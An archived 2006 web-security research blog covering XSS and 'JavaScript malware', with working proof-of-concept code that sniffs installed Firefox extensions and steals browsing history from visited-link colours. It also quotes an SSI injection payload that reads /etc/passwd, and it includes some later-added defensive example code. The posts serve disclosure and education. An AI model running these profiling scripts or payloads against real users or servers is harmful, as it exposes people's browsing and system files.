Wednesday, August 30, 2006

Details on the AT&T online store hack (yours truly quoted)

AT&T Hack Highlights Web Site Vulnerabilities.

But that's not the reason I'm blogging it. The part I found interesting was that the AT&T website in question was actually being operated by an undisclosed third party (how fortunate for them), not AT&T. For organizations of any size it's a common practice to contract with a partner to manage a portion, or even a single feature, of a web presence. Web banks do it with bill-pay, online stores with checkout, news agencies host images with Akamai, etc. Few, if any, major web presences can be considered pure anymore.

For many reasons, outsourcing specific pieces makes sound business sense. No need to build the infrastructure, software, and staff, or to figure out everything else you might not think of ahead of time. Pay a monthly/annual fee and you're good to go with better ROI. However, what's commonly forgotten from a security perspective is that it's YOUR NAME on the front of the website, not your partner's. When that third-party-run website is hacked, you're the one getting the nasty customer calls and negative headlines! You should at least be monitoring the security of the vendor-hosted website as often as your own.

Monday, August 28, 2006

What I learned as a customer

Last week I hosted a WhiteHat Security webinar for a couple hundred people that ended in spectacular failure. (To be polite I'll leave out the name of the third-party service provider, but let's just say they're a really big company and it was all their fault.) The experience was very disappointing, as this was an exciting event, an encore to the Black Hat presentation. A couple of days later something hit me. I had become a customer again rather than a vendor! I was put directly in my customers' shoes and reminded why I started WhiteHat Security and what information security professionals provide to those who depend on us: a level of confidence that someone is making sure nothing will go wrong. Let me provide some background.

I'm not comfortable with webinars. I'm used to performing demonstrations LIVE, where if something blows up, a common occurrence, I have a backup plan. Normally the audience never notices. Choosing a hosted solution was the first decision, because it doesn't make sense to build our own infrastructure. We did our homework. We selected a vendor that knew what they were doing, even if they're comparatively more costly than the alternatives. For us, that part didn't matter much. The solution felt smooth and stable and we were willing to pay for that. This is better than inviting our guests to a shoddy event. Every buying decision we made was on the basis of confidence.

The morning of the webinar the hosted backend system died, crashing many other in-progress webinars, booting the attendees, and leaving me unable to log in over sporadic connections. After realizing the problem was not on our end, we were forced to apologize to our attendees and end the webinar early. These things happen sometimes and there's not a lot you can do about it (damn that Murphy). Do we regret our selection decision? No. What you want to be able to say is that you did everything you could to prevent a bad situation. That's what we did.

An information security professional's job is helping organizations make sure nothing happens, or at least put off that eventuality for as long as possible. For security assessment providers like myself, we serve that goal by identifying vulnerabilities so they can get fixed before the bad guys exploit them. As I said before, "The reality is someone only needs a single vulnerability to exploit you and cause you to have a really bad day." Organizations depend on us to find all the vulnerabilities all the time. Sure, they could do it themselves, which is fine, but that's not the point. The point is reaching "a level of confidence that someone is making sure nothing will go wrong." That's what I was reminded of. We do a lot more than just find vulnerabilities.

So much web application security research, so little time

The amount of research going on in web application security, and especially JavaScript Malware, is simply astounding. I'm having a difficult time keeping up with what people are releasing while dedicating time to my own research. I wish I could give the following links more background information, but these are some things that have popped up over the last week that I'll be reading into. They should be of interest to others as well.


Backdooring Web Pages
IMHO, there are three types of web page backdoors: non-persistent, persistent and global persistent. Non-persistent backdoors occur on a single XSS vulnerable page (hit). Persistent backdoors are a bit better because they can occur on one or more XSS vulnerable pages, most probably coming from the same domain (site). Global persistent backdoors occur on all domains (sites) and in theory they can last forever.

XSS in CBNEWS and BBC
George Bush appoints a 9 year old to be the chairperson of the Information Security Deportment

Stealing History (Part 2)
Cody Swann has a modified version of the exploit using prototype that works in IE and has support for AJAX requests:

Response Splitting Filter Evasion
While playing with a redirection issue on a pretty major website I found a pretty weird HTTP response splitting issue, where forward slashes were not allowed (or rather, once you entered a forward slash it caused the whole redirection to be removed). Clearly the website was trying to protect itself from something, although I’m not exactly sure how or why. Here’s what I ended up doing.

US-ASCII and EUC-JP Character Injection
I spent a little time this weekend playing with my XSS fuzzer, which I am trying to get to a point where I can release it, for other researchers to play with. In doing some preliminary testing I’ve found a number of issues worth mentioning to anyone doing this form of research. Cheng Pang Su and I have been working on some of the more advanced variable width encoding, and I’ll release more on that later, as I’ve found a number of additional issues. In doing that, I have expanded the fuzzer to look at additional character encoding methods, which is how I began finding these.

AttackAPI
Provides simple and intuitive web programmable interface for composing attack vectors.

Scan for HTML Injection
This little tool scans a page for common XSS/HTML injection vulnerabilities.

BeEF
BeEF is the browser exploitation framework. Its purpose in life is to provide an easily integratable framework to demonstrate the impact of browser and cross-site scripting issues in real-time. The modular structure has focused on making module development a trivial process with the intelligence existing within BeEF.

CSRF Adds Your Feed To my.yahoo.com
In all the recent waves of RSS hacks, I thought I’d toss in another. This isn’t breaking in using RSS, but it is a method to get people to add your feed automatically. Yahoo is vulnerable to cross site request forgeries (CSRF) for logged in users to automatically add your RSS feed to their page:

Warhol Worm Becomes Spam Gateway
Our innocent little Warhol worm has begun making its rounds. There are some serious additional implications that have not been thought through completely. One thing that unsticky brought to my attention was the use of a Warhol worm for spamming. He correctly diagnoses a problem in myyearbook.com but takes it to the next step and describes what it would take to build a Warhol XSS worm.

Stealing User Information Via Automatic Form Filling
One of the most annoying things for many users is filling in form fields on websites. It's tedious for them to type the same information over and over again, especially when it's something as simple as their personal information like name, phone number, address, credit card number, expiration date, and the like. Unfortunately this can spell trouble for many users who use websites that are vulnerable to XSS.


See what I mean? A LOT!

Friday, August 25, 2006

I know what you've got (Firefox Extensions)

Update: I removed the JS PoC from the template. Was messing up IE.

Update: Some generous person, who sadly didn't leave their name, supplied me with a bunch more Firefox Extension signatures. Way cool! I updated the PoC code on the blog. Enjoy!


RSnake discovered a great way to detect installed Firefox extensions using the chrome: protocol handler. I liked it so much, and in keeping with the CSS/JS History Hack, I just had to have some proof-of-concept code for the blog. I improved upon his design a bit, making it more complete as far as popular extensions go and easier to add new signatures. In the right-side column look for the "I know what you've got" heading. Below it you should see a list of detected extensions, if any. Again, I'm not capturing this data, just redisplaying it.

The chrome protocol handler makes it possible to reach into the Firefox extensions folder and access image resources. For instance the Google Toolbar has chrome://google-toolbar/skin/icon.png. For detection, create an IMG DOM object with an onload event handler and point it at that URL. If the onload event handler fires, you know the extension is there, because the URL is unique to it.

I put in signatures for Adblock Plus, Auto Copy, ColorZilla, Customize Google, DownThemAll, Faster Fox, Flash Block, FlashGot, Forecastfox, Google Toolbar, Greasemonkey, IE Tab, IE View, JS View, Live HTTP Headers, MeasureIt, SEO For Firefox, SEOpen, Search Status, Server Switcher, StumbleUpon, Tab Mix Plus, Torrent-Search Toolbar, User Agent Switcher, View Source With, Web Developer.

Source:
// popular extensions.
var e = {
"Adblock Plus" : "chrome://adblockplus/skin/adblockplus.png",
"Auto Copy" : "chrome://autocopy/skin/autocopy.png",
"ColorZilla" : "chrome://colorzilla/skin/logo.png",
"Customize Google" : "chrome://customizegoogle/skin/32x32.png",
"DownThemAll!" : "chrome://dta/content/immagini/icon.png",
"Faster Fox" : "chrome://fasterfox/skin/icon.png",
"Flash Block" : "chrome://flashblock/skin/flash-on-24.png",
"FlashGot" : "chrome://flashgot/skin/icon32.png",
"Forecastfox" : "chrome://forecastfox/skin/images/icon.png",
"Google Toolbar" : "chrome://google-toolbar/skin/icon.png",
"Greasemonkey" : "chrome://greasemonkey/content/status_on.gif",
"IE Tab" : "chrome://ietab/skin/ietab-button-ie16.png",
"IE View" : "chrome://ieview/skin/ieview-icon.png",
"JS View" : "chrome://jsview/skin/jsview.gif",
"Live HTTP Headers" : "chrome://livehttpheaders/skin/img/Logo.png",
"MeasureIt" : "chrome://measureit/skin/measureit.png",
"SEO For Firefox" : "chrome://seo4firefox/content/icon32.png",
"SEOpen" : "chrome://seopen/skin/seopen.png",
"Search Status" : "chrome://searchstatus/skin/cax10.png",
"Server Switcher" : "chrome://switcher/skin/icon.png",
"StumbleUpon" : "chrome://stumbleupon/content/skin/logo32.png",
"Tab Mix Plus" : "chrome://tabmixplus/skin/tmp.png",
"Torrent-Search Toolbar" : "chrome://torrent-search/skin/v.png",
"User Agent Switcher" : "chrome://useragentswitcher/content/logo.png",
"View Source With" : "chrome://viewsourcewith/skin/ff/tb16.png",
"Web Developer" : "chrome://webdeveloper/content/images/logo.png",
"Unhide Passwords" : "chrome://unhidepw/skin/unhidepw.png",
"UrlParams" : "chrome://urlparams/skin/urlparams32.png",
"NewsFox" : "chrome://newsfox/skin/images/home.png",
"Add N Edit Cookies" : "chrome://addneditcookies/skin/images/anec32.png",
"GTDGmail" : "chrome://gtdgmail/content/gtd_lineitem.png",
"QuickJava" : "chrome://quickjava/content/js.png",
"Adblock Filterset.G Updater" : "chrome://unplug/skin/unplug.png",
"BBCode" : "chrome://bbcode/skin/bbcode.png",
"BugMeNot" : "chrome://bugmenot/skin/bugmenot.png",
"ConQuery" : "chrome://conquery/skin/conquery.png",
"Download Manager Tweak" : "chrome://downloadmgr/skin/downloadIcon.png",
"Extended Cookie Manager" : "chrome://xcm/content/allowed.png",
"FireBug" : "chrome://firebug/content/firebug32.png",
"FoxyTunes" : "chrome://foxytunes/skin/logo.png",
"MR Tech Disable XPI Install Delay" : "chrome://disable_xpi_delay/content/icon.png",
"SessionSaver .2" : "chrome://sessionsaver/content/ss.png",
"spooFX" : "chrome://spoofx/skin/main/spoofx.png",
"Statusbar Clock" : "chrome://timestatus/skin/icon.png",
"Torbutton" : "chrome://torbutton/skin/bigbutton_gr.png",
"UnPlug" : "chrome://unplug/skin/unplug.png",
"View Source Chart" : "chrome://vrs/skin/vrssmall.png",
"XPather" : "chrome://xpather/content/iconka.png",

};

// is_mozilla is also set by the history PoC that shares this template
var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

if (is_mozilla) {
  showExtensions();
}

// For each signature, create a hidden <img> pointing at the extension's
// chrome:// image. onload fires only if the resource exists, i.e. the
// extension is installed; its name is then listed under the #ext element.
function showExtensions() {
  for (var i in e) {
    var img = document.createElement("img");
    img.setAttribute("border", '0');
    img.setAttribute("width", '0');
    img.setAttribute("height", '0');
    // bind the extension name in a closure rather than building the handler as a string
    img.onload = (function (name) {
      return function () {
        var li = document.createElement('li');
        li.appendChild(document.createTextNode(name));
        document.getElementById('ext').appendChild(li);
      };
    })(i);
    img.setAttribute("src", e[i]);
  }
}

If you have more signatures with extension names and unique chrome URLs, comment them in and I'll add them to the list. And I agree with RSnake that we'll have to dig deeper into the chrome handler to see if any issues exist with the extensions. So much research, so little time.

Driving off with the fuel pump

As most have, I've seen all those "funny pictures" of people driving down the street with a fuel pump hanging out of their gas tank. Last night, I got to see it for myself first hand! Unfortunately the event turned out to be anticlimactic. No gas geysers, people running for cover, or the attendant screaming "OMG!". Actually, he only seemed annoyed. Like he'd seen it happen a hundred times before. Oh well.



Thursday, August 24, 2006

Staying secure by getting out of the line of fire

It's difficult to know if a piece of software is more secure than another. Yet this doesn't stop anyone from hollering Trustworthy Computing! Unbreakable! Security in the SDLC! h0HO 0Wn3D j00! This fuels never ending debates: "Is Windows more secure than OS X?", "How about Firefox and Internet Explorer?", "IIS and Apache?". Let's face facts, all software has vulnerabilities, that is unless it has zero bugs. I don't think anyone buys that one. What matters to us all is, "How do I not get hacked?".

There are people who gauge hackability by the number of known vulnerabilities in a software product. "Hey! My OS has had fewer vulnerabilities than yours! Neener Neener Neeeeeener." C'mon, this metric isn't helpful, as it fails to inform me about how likely I'd be to NOT GET HACKED. It could be that researchers are not looking for vulnerabilities in that product, vulnerabilities are counted in strange ways, people are not disclosing the issues, or a dozen other things. The reality is someone only needs a single vulnerability to exploit you and cause you to have a really bad day. The bad guys know that. What if we took a different approach, like...

Getting out of the line of fire.

The real deal is criminals are profit-driven and the cyber types are no different. They're in it for the money. For them, targeting the lowest common denominator of their victims makes the most sense. Sure, some hackers are after the fame of being the best or the first to hack a particularly difficult system. These glory-driven types are not the ones you need to worry about. The 21st century crimes are fraud and identity theft. If you were a cyber-criminal, would you go after the product that has 95% market share or the 5% market share? Yeah, me too. Sorry Microsoft, that means you.

Mind you, security isn't the primary reason I choose to use OS X and Firefox. I use them because the software allows me to be more productive than anything else available. I have no use for something that is highly secure but doesn't allow me to work proficiently by myself and with others. Sorry OpenBSD, that means you. Or something that is so far out of the way that I can't get my work done because there's no software. Sorry Amiga, that means you.

Do I think OS X and Firefox are more secure than Windows or IE? Yes, I "think" so. But I don't "know" for sure and the truth is I really don't care. What I do know is the chances of me getting hacked on my PowerBook vs. the next guy using a dude-you're-getting-a-Dell is night and day. I mean, PC users are in a war for control of their own machine. Who needs that headache!? Am I saying that by using OS X and Firefox I'm 100% safe? No way. Though I have got out of the way and decreased my chances of getting hacked. That's what's important.

Now watch, tomorrow some 0-day will own me and I'll be eating crow for the rest of 2006.

Wednesday, August 23, 2006

Web security is completely broken

This was my first thought when a friend of mine, Dennis Groves, asked my opinion on the current state of web application security. In light of the recent research by myself and several other experts, JavaScript Malware breaks all the security models to the point where it's very VERY difficult to protect yourself or your websites, even if you're one of the people in "the know". That leaves 90% of people out there without adequate security. This is why it's vital that developers and information security professionals learn about these new attacks and understand how they impact them.

Don't believe for a moment that SSL, firewalls, patching, anti-virus, anti-spam, anti-phishing solutions, two-factor auth, or anything else like that helps. Click on the wrong link or visit a website at the wrong time (especially popular websites) and you could be infected. The fact that 9 out of 10 websites have a cross-site scripting (XSS) vulnerability makes the situation just that much worse!

As much as I am a vendor who assists organizations in securing their websites, I'm also a user. I buy, bank, post, comment, read, and perform other online activities just like everyone else. What worries me is that once JavaScript Malware owns my browser, and I have no idea when that happens, it literally has more control over my browser than I do. I am powerless should the JavaScript Malware instruct my browser to:
  • Hack someone else's website
  • Port scan and hack intranet websites
  • Access illegal content on the Web
  • Transfer money out of my bank account
  • Display a fake login page to steal my passwords
  • Steal my keystrokes
... there is no end to the evil...

Fortunately the black hat community has not yet begun wide-scale exploitation, YET. But they are researching, communicating, experimenting and fine tuning their own code. Don't believe me? Just have a look at who's most interested in XSS. New malicious attacks will happen; it's just a matter of time and a question of how bad.

So now what?

For website owners, the bottom line is you're going to have to find and fix your XSS vulnerabilities before the bad guys exploit them. And they are looking, that I know for sure. Users, turning off JavaScript is an option, even though it's not a great one. Doing this will break many websites we all visit and become annoying, but hey, it might be worth the trade-off due to a lack of better options.

As for myself, I periodically switch between researching new attack and defense techniques. Attack research has surged forward and we have a good idea of where the edge is. I'll be going back to researching defense strategies and seeing what new effective approaches will mitigate today's risk.

Monday, August 21, 2006

Sometimes its just that simple

I was talking with a couple of security folks about my CSS/JS History Hack, and two had come up with some very simple and elegant solutions.

Richard Bejtlich (TaoSecurity):
"I don't keep a browsing history (days = 0) on Firefox so I have nothing to show"


Ryan Barnett:
"Obviously, the CSS trick just tries to load a page with a link to the target websites and then looks at the color of the hyperlink to determine if it has been visited. This is based off of the browser preference settings for links/visited links. If I change the color of my visited links to the same color as non-visited ones, then the cute trick didn't work. The problem is that this would still be extremely effective, as how many actual users would go into their browser settings and tweak this? That's right, not many."


Two tricks that some power users can try out.

Friday, August 18, 2006

SSI Injection instead of JavaScript Malware

Update:
Wouldn't ya know it, RSnake already has something just like this in his XSS filter evasion writeup for persistent XSS, including one with a PHP injection. The question about non-persistent XSS leading to SSI Injection is still up in the air though.

While everyone is busy hacking the browser when it comes to JavaScript Malware, Ryan Barnett is researching the possibility of Server-Side Include (SSI) Injection using the same attack vector. He ran his ideas by me earlier today...
"I noticed through numerous tests that they were running on Apache and that they had some default configs set. One of these settings is "Options Includes" which allows for Server-Side Include parsing of pages. Anyways, instead of submitting the normal "<script>alert('XSS Alert')</script>" XSS injection code, I used this -

<!--#exec cmd="cat /etc/passwd" -->

and it showed the contents of the passwd file in the returned page."

I've seen this behavior happen from time to time in the same areas where you might find persistent XSS, but only rarely. Ryan goes on to speculate about possible SSI Injection where non-persistent XSS typically occurs.
"While this does work, it doesn't work in all circumstances. After some testing, I found that this will not work in reflected XSS. It needs to be stored XSS as it needs to be stored in a page first and then the page is parsed for SSI. This attack also doesn't work with normal CGI pages but might work with other scripting languages.

The bottom line is this - wherever you find XSS input validation issues, you should try different SSI strings to see if you can get OS commands to execute in the returned page."
I can't say that I've seen this behavior personally. We'll start doing our wider testing on this since it sounds plausible. Would anyone else care to chime in if they've seen this behavior?
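The defender's side of the exchange above, as an added example that is not Ryan's or this blog's code: a detector for stored SSI directives plus the same output encoding that stops persistent XSS, which also neutralizes SSI injection because mod_include only acts on a literal "<!--#". The sample comments, the helper names and the flagging logic are constructed for this illustration.

```javascript
// Parses <!--#name attr="..." --> directives out of a string. mod_include
// requires "<!--#" with no whitespace before the '#'; the attribute part
// is captured loosely so it can be logged for review.
function findSsiDirectives(text) {
  const re = /<!--#\s*([a-z]+)\s*([^>]*?)\s*-->/gi; // fresh regex, no shared lastIndex
  const found = [];
  let m;
  while ((m = re.exec(text)) !== null) {
    found.push({ directive: m[1].toLowerCase(), args: m[2].trim() });
  }
  return found;
}

// HTML entity encoding applied when user content is rendered. Encoding
// '<' means neither <script> nor <!--# reaches the browser or the SSI
// parser as markup, so the stored comment is shown as plain text.
function encodeForHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, c => map[c]);
}

// Hypothetical handling for a submitted comment: keep the encoded form
// for rendering and flag any directive for alerting. On the server side,
// Apache's "Options IncludesNOEXEC" additionally refuses #exec while
// leaving other includes working.
function processComment(raw) {
  return { stored: encodeForHtml(raw), flagged: findSsiDirectives(raw) };
}

// Constructed inputs: the exec payload quoted in the post, an include
// variant, and an ordinary HTML comment that must not be flagged.
const SAMPLES = [
  'nice site <!--#exec cmd="cat /etc/passwd" --> thanks',
  '<!--#include virtual="/cgi-bin/counter.pl" -->',
  '<!-- just a normal comment -->',
];

for (const s of SAMPLES) {
  const r = processComment(s);
  console.log(JSON.stringify(r.flagged), '=>', r.stored);
}
```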

Thursday, August 17, 2006

Denial of Service in BofA via Sitekey

Vulnerability of Passmark Sitekey at Bank of America reported
"Sestus Data Corporation announced today the discovery of a vulnerability of the Passmark Sitekey login approach at Bank of America that could permit an attacker to remotely lock out thousands of customers from their online banking accounts."

This type of issue happens often in websites, especially those with millions of users, when implementing hard and fast rules in anti-brute force. When you have millions of users, just about every guessable username is taken. At that point it's trivial for someone to automatically fail login attempts and block your users from logging in. This was a popular tactic in on-line auctions to block competitive bidders. It's incredibly frustrating for users when this happens.

A better way to tackle anti-brute force in a web environment is to use CAPTCHAs once a threshold has been reached. Sure, a bad guy can keep guessing passwords and filling out those crazy images (a few seconds per), but if you have any kind of password policy in place, your risk here is minimal.
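As an added example, not from the post, here is the contrast between the two policies above on the same flood of bad logins: a hard per-account lockout (the behaviour the lockout report describes) beside an escalate-to-CAPTCHA policy. The policy names, the 5-failure threshold and the 15-minute window are assumptions chosen for the demonstration.

```javascript
const WINDOW_MS = 15 * 60 * 1000; // failures older than this are forgotten (assumed)
const THRESHOLD = 5;              // failures in the window before the policy reacts (assumed)

// Sliding window of recent failure timestamps, keyed by username.
// `now` is injectable so the scenario below can drive a fake clock.
class FailureTracker {
  constructor(now = Date.now) {
    this.now = now;
    this.failures = new Map();
  }
  fresh(username) {
    const t = this.now();
    return (this.failures.get(username) || []).filter(ts => t - ts < WINDOW_MS);
  }
  recordFailure(username) {
    const list = this.fresh(username);
    list.push(this.now());
    this.failures.set(username, list);
  }
  recentFailures(username) {
    return this.fresh(username).length;
  }
  clear(username) {
    this.failures.delete(username);
  }
}

// Policy A: hard lockout. Anyone who can guess a username can lock its
// owner out just by failing THRESHOLD logins, which is the denial of
// service the post describes.
function hardLockoutPolicy(tracker, username) {
  return tracker.recentFailures(username) >= THRESHOLD ? 'locked' : 'allow';
}

// Policy B: past the threshold the account stays usable, but every
// attempt must also carry a solved CAPTCHA. The owner pays one extra
// step; an automated guesser is throttled to human speed, and a
// password policy keeps the remaining guess rate from mattering.
function captchaPolicy(tracker, username) {
  return tracker.recentFailures(username) >= THRESHOLD ? 'captcha_required' : 'allow';
}

// One login attempt. `credentialsOk` and `captchaOk` stand in for the
// real password and CAPTCHA verifications.
function attemptLogin(tracker, policy, username, credentialsOk, captchaOk = false) {
  const decision = policy(tracker, username);
  if (decision === 'locked') return 'denied_locked';
  if (decision === 'captcha_required' && !captchaOk) return 'denied_need_captcha';
  if (!credentialsOk) {
    tracker.recordFailure(username);
    return 'denied_bad_password';
  }
  tracker.clear(username); // a successful login resets the counter
  return 'ok';
}

// Constructed scenario: THRESHOLD wrong guesses arrive for "victim",
// then the real owner logs in with the correct password, first without
// and then with a solved CAPTCHA, and finally again after the window
// has expired. Returns the three outcomes under the given policy.
function simulateAccountFlood(policy) {
  let clock = 0;
  const tracker = new FailureTracker(() => clock);
  for (let i = 0; i < THRESHOLD; i++) {
    attemptLogin(tracker, policy, 'victim', false);
    clock += 1000;
  }
  const ownerPlain = attemptLogin(tracker, policy, 'victim', true);
  const ownerWithCaptcha = attemptLogin(tracker, policy, 'victim', true, true);
  clock += WINDOW_MS;
  const ownerLater = attemptLogin(tracker, policy, 'victim', true);
  return { ownerPlain, ownerWithCaptcha, ownerLater };
}

console.log('hard lockout:', simulateAccountFlood(hardLockoutPolicy));
console.log('captcha     :', simulateAccountFlood(captchaPolicy));
```

Under the lockout policy the legitimate owner is shut out until the window expires; under the CAPTCHA policy the owner gets in on the next attempt that carries a solved CAPTCHA.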

Who is interested in XSS?

In the last 12 months, the good guys and bad guys alike have been learning about the risks posed by XSS at a furious pace. From the SEOs (search engine optimizers) to casual researchers to phishers to security vendors to infosec professionals, everyone is trying to get a handle on what the most recent research means to them. The key JavaScript Malware issues we've seen are worms, defacements, phishing scams, port scanners, intranet hacking, web server fingerprinting, and history stealing. This is likely just the beginning as the exploits become more refined and of course malicious.

Taking a look at the mainstream press, Brian Krebs from the Washington Post blogged "Cross-Site Scripting Flaws Abound". Among other things Brian talks about XSS disclosures in the websites of Verisign, eEye Digital Security, Cisco Systems, F-Secure, Snort.org, the National Security Agency, eBay, and Amazon. There is a running thread on SecurityLab about additional vulnerabilities in IBM, MSN, CyberTrust, etc. If there was ever any question, XSS vulnerabilities are epidemic. Just about every website has AT LEAST one. No one is safe, not even security vendors.

Also, I'm a member of some public and private bulletin boards that help me stay up to date on who's doing what and for what reasons. For instance SEOs are utilizing XSS to boost website ranking by making it appear that popular websites are linking to their websites. It's a simple XSS-defacement exploit, where the defacement is an a href link injection. And I can tell you right now, the websites they are targeting are big.

RSnake clued me into this; check it out on Google Trends, searching for XSS and Cross Site Scripting:





The U.S. didn't even make the Top 10 in "XSS" and only 6th in "Cross Site Scripting". Those who do top the list tell a compelling story about who is THE MOST interested. JavaScript Malware is the new shell code, time to get prepared.

CSS/JS History Hack ported to Internet Explorer

I've been traveling the last few days and there has been so much webappsec news recently. Let's see if I can catch up.

pdp (architect) from gnucitizen has ported my JavaScript/CSS visited link scanner over to Internet Explorer. I haven't tried it out myself, since I run a mac, but this should help out the Windows guys in learning about this stuff.
"The POC presented here is my improved version of the POC presented in BlackHat. I made it work well in IE6, IE7, Firefox and Opera. IE6 has very nasty disabilities when dealing with dynamically generated style sheets. However, these can be easily sorted out by reusing the current style sheet. If you are interested in how it works just read the provided source code."
Upon inspection of the rest of pdp's projects, a lot of his other PoC code projects look really interesting to any webappsec person, including a JavaScript Authorization Forcer, JavaScript Address Info, XSSing the LAN, and another JavaScript port scanner. JavaScript Malware is truly the new shell code and we can expect a lot more research to continue in this area.

Friday, August 11, 2006

I know where you've been

Update 2: CSS History Hack Demonstration code available. Thank you to RSnake for hosting.

Update: Removed the JS PoC from the template and pasted it below. Was messing up IE.

I updated the blog template to display some proof-of-concept browser history stealing JavaScript code. In the right-side column notice the "I know where you've been" heading. Below that, if you're using Firefox, Mozilla, Netscape or Safari, you should see a bunch of links to websites you've been to. Don't worry, I'm not capturing this data, only you can see it, though it does prove a point. This trick probably works in Internet Explorer, though I haven't tried to port the code to find out for sure. I wonder how long until the marketers start using this for additional visitor profiling. Feel free to view-source and find the trick.

var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
"http://ajaxian.com/",
"http://digg.com/",
"http://english.aljazeera.net/HomePage",
"http://ha.ckers.org",
"http://ha.ckers.org/blog/",
"http://jeremiahgrossman.blogspot.com/",
"http://login.yahoo.com/",
"http://mail.google.com/",
"http://mail.yahoo.com/",
"http://my.yahoo.com/",
"http://reddit.com/",
"http://seoblackhat.com",
"http://slashdot.org/",
"http://techfoolery.com/",
"http://weblogs.asp.net/jezell/",
"http://www.amazon.com/",
"http://www.aol.com/",
"http://www.bankofamerica.com/",
"http://www.bankone.com/",
"http://www.blackhat.com/",
"http://www.blogger.com/",
"http://www.bloglines.com/",
"http://www.bofa.com/",
"http://www.capitalone.com/",
"http://www.cenzic.com",
"http://www.cgisecurity.com",
"http://www.chase.com/",
"http://www.citibank.com/",
"http://www.cnn.com/",
"http://www.comerica.com/",
"http://www.e-gold.com/",
"http://www.ebay.com/",
"http://www.etrade.com/",
"http://www.expedia.com/",
"http://www.google.com/",
"http://www.hsbc.com/",
"http://www.icq.com/",
"http://www.jailbabes.com",
"http://www.microsoft.com/",
"http://www.msn.com/",
"http://www.myspace.com/",
"http://www.ntobjectives.com",
"http://www.passport.net/",
"http://www.paypal.com/",
"http://www.sourceforge.net/",
"http://www.spidynamics.com",
"http://www.statefarm.com/",
"http://www.usbank.com/",
"http://www.wachovia.com/",
"http://www.wamu.com/",
"http://www.watchfire.com",
"http://www.webappsec.org",
"http://www.wellsfargo.com/",
"http://www.whitehatsec.com",
"http://www.xanga.com/",
"http://www.yahoo.com/",
"http://seoblackhat.com/",
"http://www.alexa.com/",
"http://www.youtube.com/",
"https://banking.wellsfargo.com/",
"https://commerce.blackhat.com/",
"https://online.wellsfargo.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

  var d = document.createElement('div');
  d.id = 'xss_flag';
  document.body.appendChild(d);

  // table that will hold the visited links (DOM properties are camelCase)
  var t = document.createElement('table');
  t.border = 0;
  t.cellPadding = 5;
  t.cellSpacing = 10;
  t.width = '90%';
  t.align = 'center';
  t.id = 'data';
  document.body.appendChild(t);

  /* launch steal history */
  if (is_mozilla) {
    stealHistory();
  }

}

// Add one visited site as a row of the #data table. The original
// document.write() calls here lost their markup on extraction, so the
// rows are built through the DOM instead.
function addVisited(url) {
  var row = document.getElementById('data').insertRow(-1);
  var cell = row.insertCell(0);
  var a = document.createElement('a');
  a.href = url;
  a.appendChild(document.createTextNode(url));
  cell.appendChild(a);
}

function stealHistory() {

  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {
    var link = document.createElement("a");
    link.id = "id" + i;
    link.href = websites[i];
    link.innerHTML = websites[i];
    document.body.appendChild(link);
    // the template's stylesheet colors a:visited blue; an unvisited
    // link gets the default link color, so the computed color tells them apart
    var color = document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
    document.body.removeChild(link);
    // check for visited
    if (color == "rgb(0, 0, 255)") {
      addVisited(websites[i]);
    } // end visited check

  } // end visited website loop

} // end stealHistory method

Where have I been?

I've attended and presented at tons of conferences all over the world. I've also visited quite a number of companies in and around Silicon Valley. During that time I've been collecting the badges from those venues and pinning them to my cube wall. It's become a timeline, but without the organization. In the mess you can make out badges from BlackHat, Defcon, RSA, ISSA, ISACA, eBay, Yahoo, ToorCon, and the private parties in between. Maybe they'll be worth something someday. Which of these do you still have?




Home from BlackHat and Defcon

I've been busy busy busy since I got home from BlackHat. And probably more busy in the coming week.

TC and I gave our JavaScript Malware talk (Hacking Intranet Websites from the Outside) to a packed 1,000 plus audience. Everyone was completely engaged and we opened a lot of eyes. XSS and JavaScript Malware is no longer the kind and gentle vulnerability it used to be. Lots of press were also in attendance, including Brian Krebs from the Washington Post who called the presentation "rather disturbing". The media attention has been crazy (USA Today, eWeek, Information Week, you name it). I think we even scared most of the experts with the demos. Everyone ran home and changed the p/w on their DSL router. :) Tons of people stopped us during the remaining BH and Defcon saying that we had the best talk. For a presenter, there is no better feedback. We'll chalk this one up as a 100% success. Slides and PoC available for download.

Beyond the show itself we hung out with RSnake, Arian Evans (and g/f), Andrew van der Stock, Bob Auger, Danny Allen, Kurt Roemer, Erik Peterson, Matt Fisher, Billy Hoffman, and a bunch of others from SPI/Cenzic/Watchfire and elsewhere. We had an absolute blast. And the WASC meet-up at the Shadow bar was great fun as well. About 30 people attended with lots of laughs and stories. This is really why you attend the infosec conferences. You never know exactly what you're going to learn or who you're going to meet. RSnake has some Defcon pictures here. I posted some below.


Arian sporting an approving grin moments before security guards surrounded his laptop. We must have been the only shady looking hacker type characters at Defcon. Riiiiiiight. :)



RSnake and Andrew van der Stock at breakfast



The awkward moment between Billy and RSnake


Matt in his B-Day chair at 4am breakfast



Robert in his classic hacker superman pose



TC and Matt doing Sambuca shots while they light each other's mouth on fire.

Thursday, August 10, 2006

Me on TV again, but this time not for security

I play Australian rules football (footy) on the weekends. Our local league, The Golden Gate Australian Rules Football League (GGAFL), was featured on the Channel 2 evening news (clip below). If you know what I look like, you can catch me in several of the frames (#29). For those not familiar with the game (Americans), it's like a cross between soccer and American football. Constant running and field action with the hard hitting of football. No helmets, no pads, I love it. Been playing for about 3 years. There is also a slowmo clip of me going for a ruck, kinda like the tip-off in basketball. The day this game was filmed it was hot hot hot, 115 deg hot (pic below).